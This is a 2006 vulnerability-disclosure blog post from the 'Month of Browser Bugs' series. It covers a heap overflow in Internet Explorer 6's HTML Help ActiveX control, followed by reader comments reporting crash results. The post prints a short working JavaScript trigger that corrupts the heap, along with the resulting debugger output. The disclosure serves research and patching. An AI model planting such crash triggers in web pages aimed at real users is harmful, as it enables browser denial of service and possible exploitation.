MoBB #2: Internet.HHCtrl Image Property
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. This bug is interesting because a small heap overflow occurs each time this property is set. The bug is difficult to detect unless heap verification has been enabled in the global debug flags for iexplore.exe. The demonstration below results in a possibly exploitable heap corruption after 128 or more iterations of the property set.
var a = new ActiveXObject("Internet.HHCtrl.1");
var b = unescape("XXXX");
while (b.length < 256) b += b;
for (var i=0; i<4096; i++) {
a['Image'] = b + "";
}
Demonstration
eax=00030288 ebx=00030000 ecx=7ffdd000
edx=00030608 esi=58585850 edi=00000022
eip=7c911f52 esp=0013afcc ebp=0013b1ec
ntdll!RtlAllocateHeap+0x31b:
7c911f52 8a4605 mov al,[esi+0x5] ds:0023:58585855=??
This bug was reported to Microsoft on March 6th, 2006.
This bug has been added to the OSVDB:
Microsoft IE HTML Help COM Object Image Property Heap Overflow.
posted by hdm @ 9:11 AM
38 comments
links to this post
38 Comments:
IE-6 SP1 (the latest) didn't do anything. It was NOT crashing! Security level for the Internet Zone was set on HIGH (recommended).
System: Windows XP home SP2.
IE6 seems unaffected by this code with Win2K as the OS.
IE7 beta 2 on Windows Vista built 5384 was also unaffected. It asked if I wanted to execute the script, and nothing happened after allowing it.
IE 6.0.2800.1106 on xpsp.1020828-1920
no crash:
Internet zone was very low
Browser crashing... ;)
Crashed mine
6.0.2900.2180
No crash here :)
cool, exploitable one :)
It crashes my IE6 with win2k OS. does not affect firefox at all.
It does crash, when you change your security settings.When you switch it to "high" it wont crash but when you switch it to "low" it will crash. However my browser did crash :-) (WinXP SP2).
IE7 Beta 3 (7.0.5450.4) crashed on windows xp sp2.
IE-6 SP2 on winXP crashes
IE6 SP2 on WinXP crashes
Also this exploit requires explicit ActiveX installation, so it's not dangerous. With IE6 SP2 or greater you have a big warning by the info bar
Windows XP, totally unpatched.
No Service Packs for windows or IExplorer. Does not crash.
IE7 beta 3 on Windows XP SP2 was also unaffected.
Didn't crash IE-7 on XP pro SP2.
IE7 beta 3 crashes, those with the beta claiming it doesnt are doing it wrong.
No Crash Here - Except an ERROR ON PAGE was displayed -> Automation Server failed to create object or something like that ... maybe there's certain conditions - i'm default security settings with prompt for all cookies, immunised by Spybot S&D + Spywareblaster with TeaTimer protection and a Pop-up Stopper.
IE on XP SP2, demo didn't
work. I got a JavaScript
error right after clicking
the "start demo" button:
"Automation server can't
create object", "Line 5",
"Char 2".
FWIW, I have SpywareBlaster
installed, SpyBot installed
with "TeaTimer" running
and "Immunize" area fully
enabled. I'm running KAV6
AV, Sygate Pro firewall....
if any of that has anything
to do with blocking the
exploit test code example.
-Clint
In windows 98, my browser didn't crash
No problems with IE 7 (Beta3) running on XP
Crashed mine with IE6-sp2
Had no crash on XP SP2 with IE6 SP2 not updated with more patches after.
No crash/effect on XP2 IE6 SP2 (no further patches).
No crash with XP, No Services Pack in windows, No Services Pack in IE. :/
Crashed IE 6.0.2900.2180.xpsp_sp2_gdr.050301-1519
Cipher Strength: 128-bit
SP2.
2 errors and force to shut down IE.
No effect on FireFox.
OS= XP SP2 ALL curren MS patches.
Anyone have evidence that this will allow shellcode execution, or is this simply a DoS vulnerability?
IE7 Beta crashes
me love IE , BrowserFun is huge Fun
Thanks HD
Me love IE ,
Browser Fun is a Huge fun
Thank you HD
IE7 beta3 crash
Crashed Mine !!
IE7 beta 3 NO CRASH! The ones who are saying it does crash are probably MS bashers.
Anyone reporting "NO CRASH" on IE 7 are mistaken - the vulnerability is still there, it just requires ActiveX to be enabled for it trigger.
This bug affects BOTH IE6 and IE7!
IE7, however, requires the user to click the information bar and consent to allowing the HtmlHelp control to be accessed.
I have been using IE7 Beta 1 for sometime as my primary browser been very pleased odd crash but what would you expect from the first release.
But I have just upgraded to IE7 Beta 3 and find that sometimes it quits (or crashes) out with no errors. Any ideas?
Something weird i didn't figure out is another error, check this website: http://www.tvalentejo.tv
always crashing when we try to change to other videos
Post a Comment
Links to this post:
Create a Link
<< Home